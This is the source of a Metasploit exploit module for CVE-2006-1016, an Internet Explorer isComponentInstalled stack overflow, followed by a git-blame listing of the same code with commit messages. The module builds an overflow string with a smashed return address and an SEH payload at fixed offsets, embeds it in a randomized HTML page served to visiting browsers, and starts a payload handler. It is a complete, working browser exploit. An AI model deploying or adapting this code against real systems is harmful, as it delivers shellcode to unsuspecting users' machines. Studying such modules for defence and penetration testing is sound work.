metasploit-framework/modules/exploits/windows/browser/ie_iscomponentinstalled.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Internet Explorer. This bug was
				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
				],
			'References'     =>
				[
					[ 'CVE', '2006-1016' ],
					[ 'OSVDB', '31647' ],
					[ 'BID', '16870' ],
				],
			'Payload'        =>
				{
					'Space'          => 512,
					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Create the overflow string
		pattern = rand_text_alpha(8192)

		# Smash the return address with a bogus pointer
		pattern[744, 4] = [0xffffffff].pack('V')

		# Handle the exception :-)
		seh = generate_seh_payload(target.ret)
		pattern[6439, seh.length] = seh


		# Build out the HTML response page
		var_client = rand_text_alpha(rand(30)+2)
		var_html   = rand_text_alpha(rand(30)+2)

		content = %Q|
<html>
<head>
	<script>
		function window.onload() {
			#{var_client}.style.behavior = "url(#default#clientCaps)";
			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" );
		}
	</script>
</head>
<body id="#{var_client}">
#{var_html}
</body>
</html>
		|

		content = Rex::Text.randomize_space(content)

		# Insert the shellcode
		content.gsub!('__pattern__', pattern)

		print_status("Sending #{self.name}")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Seh`
			`include Msf::Exploit::Remote::HttpServer::HTML`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Internet Explorer isComponentInstalled Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Internet Explorer. This bug was`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.`
			`},`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Author' =>`
			`[`
			`'hdm',`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`],`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'References' =>`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`[`
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`[ 'CVE', '2006-1016' ],`
			`[ 'OSVDB', '31647' ],`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`[ 'BID', '16870' ],`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 512,`
			`'BadChars' => "\x00\x5c\x0a\x0d\x22",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' => 0x71ab8e4a } ]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Feb 24 2006'))`
			`end`

			`def on_request_uri(cli, request)`

			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# Create the overflow string`
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`pattern = rand_text_alpha(8192)`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00
			`# Smash the return address with a bogus pointer`
			`pattern[744, 4] = [0xffffffff].pack('V')`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`# Handle the exception :-)`
			`seh = generate_seh_payload(target.ret)`
			`pattern[6439, seh.length] = seh`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00
			`# Build out the HTML response page`
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`var_client = rand_text_alpha(rand(30)+2)`
			`var_html = rand_text_alpha(rand(30)+2)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`content = %Q\|`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`<html>`
			`<head>`
			`<script>`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`function window.onload() {`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`#{var_client}.style.behavior = "url(#default#clientCaps)";`
			`#{var_client}.isComponentInstalled( "__pattern__" , "componentid" );`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`}`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`</script>`
			`</head>`
			`<body id="#{var_client}">`
			`#{var_html}`
			`</body>`
			`</html>`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`\|`

randomize_space git-svn-id: file:///home/svn/framework3/trunk@5496 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-25 05:29:29 +00:00			`content = Rex::Text.randomize_space(content)`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# Insert the shellcode`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`content.gsub!('__pattern__', pattern)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Remove spurious cli.peerhost in output 2012-04-20 19:31:42 +00:00			`print_status("Sending #{self.name}")`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00
			`# Transmit the response to the client`
			`send_response_html(cli, content)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Consistent use of handler(cli) after the payload is sent to the user git-svn-id: file:///home/svn/framework3/trunk@4645 4d416f70-5f16-0410-b530-b9f4589650da 2007-04-04 04:34:17 +00:00			`# Handle the payload`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`handler(cli)`
Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:03:43 +00:00			`end`

Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`